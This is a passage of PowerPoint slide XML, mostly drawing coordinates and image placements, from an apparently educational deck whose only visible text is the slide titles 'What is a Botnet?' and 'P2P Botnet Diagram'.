            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
              <a:p/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43" name="object 23"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId23"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4151884" y="4720208"/>
                <a:ext cx="697865" cy="730885"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="697864" h="730885">
                    <a:moveTo>
                      <a:pt x="697357" y="99060"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="592201" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348272" y="258889"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107442" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1651" y="98425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248970" y="364286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="628523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105156" y="727583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347586" y="470281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589915" y="730758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="695706" y="632333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446887" y="364883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697357" y="9906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p/>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="object 24"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2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7105" y="8575"/>
              <a:ext cx="1022" cy="10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What is a Botnet?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745" y="1022350"/>
            <a:ext cx="4241800" cy="4959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P2P Botnet Diagram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7" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2387283" y="1501140"/>
            <a:ext cx="7417435" cy="4890770"/>
            <a:chOff x="0" y="912812"/>
            <a:chExt cx="8877300" cy="5853430"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="object 4"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6953522" y="2360848"/>
              <a:ext cx="1086884" cy="1071208"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="object 5"/>
            <p:cNvPicPr/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3010279" y="3052473"/>
              <a:ext cx="2652003" cy="1521358"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="object 6"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6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630943" y="5134618"/>
              <a:ext cx="946676" cy="782870"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="object 7"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8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5458999" y="4855745"/>
              <a:ext cx="1050188" cy="890013"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="object 8"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10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6105525" y="3413125"/>
              <a:ext cx="1884426" cy="1257300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="object 9"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12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3478930" y="5199327"/>
              <a:ext cx="1079464" cy="869784"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="object 10"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14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963690" y="3613804"/>
              <a:ext cx="1061783" cy="1055748"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="object 11"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId16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095875" y="1809750"/>
              <a:ext cx="2046224" cy="1365250"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="object 12"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId18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2847975" y="1196975"/>
              <a:ext cx="2751201" cy="1835150"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="object 13"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId20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1095375" y="1749425"/>
              <a:ext cx="2024126" cy="1349375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="object 14"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId22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1800225" y="2095500"/>
              <a:ext cx="933450" cy="622300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="object 15"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId24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3562350" y="1841500"/>
              <a:ext cx="857250" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="object 16"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId26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3390900" y="5308600"/>
              <a:ext cx="857250" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="object 17"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId27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6810375" y="3632200"/>
              <a:ext cx="857250" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="object 18"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId28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5686425" y="2184400"/>
              <a:ext cx="857250" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="object 19"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId29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5715000" y="4975225"/>
              <a:ext cx="857250" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="object 20"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId30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1685925" y="5232400"/>
              <a:ext cx="857250" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="object 21"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId31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1276350" y="3756025"/>
              <a:ext cx="857250" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId32"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2013585" y="2374899"/>
              <a:ext cx="4907915" cy="2876550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="156845" y="1763395"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="145415" y="1726946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1772539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11430" y="1808861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156845" y="1763395"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="218694" y="1550543"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="207391" y="1514094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128270" y="1538681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116967" y="1502283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24765" y="1590675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150876" y="1611376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141312" y="1580642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139573" y="1575028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218694" y="1550543"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="391541" y="2549525"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="368681" y="2519045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257276" y="2602395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234442" y="2571877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177165" y="2686050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302895" y="2663317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286054" y="2640838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280111" y="2632900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391541" y="2549525"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="411353" y="1683639"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="399923" y="1647317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254508" y="1692783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265938" y="1729232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411353" y="1683639"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="445516" y="2650998"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="423418" y="2620010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299466" y="2708656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321564" y="2739644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445516" y="2650998"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="473456" y="1471549"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="462153" y="1435100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316611" y="1480312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327914" y="1516634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473456" y="1471549"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="605028" y="2389886"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="582295" y="2359406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460248" y="2450592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482981" y="2481072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605028" y="2389886"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="662432" y="2495677"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="640207" y="2464689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516255" y="2553462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538480" y="2584450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662432" y="2495677"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="665861" y="1603883"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="654431" y="1567561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509016" y="1613154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520446" y="1649476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665861" y="1603883"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="728218" y="1392555"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="716915" y="1356233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571373" y="1401318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="582549" y="1437640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728218" y="1392555"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="738886" y="217170"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="639318" y="101854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610362" y="126746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710057" y="242062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738886" y="217170"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="818642" y="2230120"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="795909" y="2199640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673735" y="2290953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696595" y="2321433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="818642" y="2230120"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="829056" y="47752"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="710565" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743458" y="123444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="829056" y="47752"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="879348" y="2340483"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="857123" y="2309495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733171" y="2398268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755396" y="2429256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879348" y="2340483"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="913130" y="418973"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="813562" y="303657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="784733" y="328549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884301" y="443992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="913130" y="418973"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="918972" y="207010"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="818007" y="92837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789432" y="117983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890397" y="232283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="918972" y="207010"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="948690" y="1495425"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="822579" y="1474978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833970" y="1511376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="763524" y="1533398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="774954" y="1569847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="845350" y="1547736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856742" y="1584071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938009" y="1505712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="948690" y="1495425"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="982853" y="1313561"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="971677" y="1277239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826008" y="1322324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837311" y="1358773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982853" y="1313561"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="1032256" y="2070481"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1009396" y="2039874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="887349" y="2131187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910209" y="2161667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032256" y="2070481"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="1087501" y="620903"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="987933" y="505587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="959104" y="530479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1058672" y="645795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1087501" y="620903"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="1095502" y="406781"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="994664" y="292608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966089" y="317881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066927" y="432054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095502" y="406781"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="1096137" y="2185289"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1074039" y="2154301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950087" y="2242947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972185" y="2273935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096137" y="2185289"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="1245857" y="1910715"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1223010" y="1880235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100963" y="1971421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123823" y="2002028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1245857" y="1910715"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="1261872" y="822706"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1162177" y="707390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1133348" y="732282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1233043" y="847598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1261872" y="822706"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="1272159" y="606679"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1171194" y="492506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1142619" y="517779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1243584" y="631952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1272159" y="606679"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="1282065" y="2028825"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1155827" y="2048891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177988" y="2079866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1167003" y="2087753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1189101" y="2118741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1200150" y="2110816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1222375" y="2141855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260995" y="2068703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1282065" y="2028825"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="1348740" y="952500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1317244" y="828675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1230757" y="903351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1348740" y="952500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="1448689" y="806577"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1347851" y="692277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1319276" y="717550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1420241" y="831723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448689" y="806577"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="1850771" y="2705227"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1792122" y="2696464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737741" y="2688336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777365" y="2809875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1841500" y="2718435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1850771" y="2705227"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="1852041" y="2438273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1814449" y="2432685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1791843" y="2583434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1829562" y="2589022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852041" y="2438273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="1891411" y="2174494"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1853819" y="2168906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1831213" y="2319655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1868932" y="2325243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1891411" y="2174494"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="2023237" y="2639568"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1985137" y="2637663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1977390" y="2789809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015490" y="2791841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2023237" y="2639568"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="2036699" y="2373249"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1998726" y="2371344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1990979" y="2523490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2028952" y="2525395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2036699" y="2373249"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="2064004" y="386715"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2043938" y="235585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2006092" y="240665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2026285" y="391668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2064004" y="386715"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="2076323" y="2345944"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2025015" y="2228850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1962150" y="2340102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2076323" y="2345944"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="2123694" y="545846"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2085962" y="550887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2079117" y="499999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2041398" y="504952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2048154" y="555929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010410" y="560959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2082165" y="666750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113737" y="574802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2123694" y="545846"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="2258949" y="336550"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2250732" y="326644"/>
                  </a:lnTo>
                  <a:lnTo>
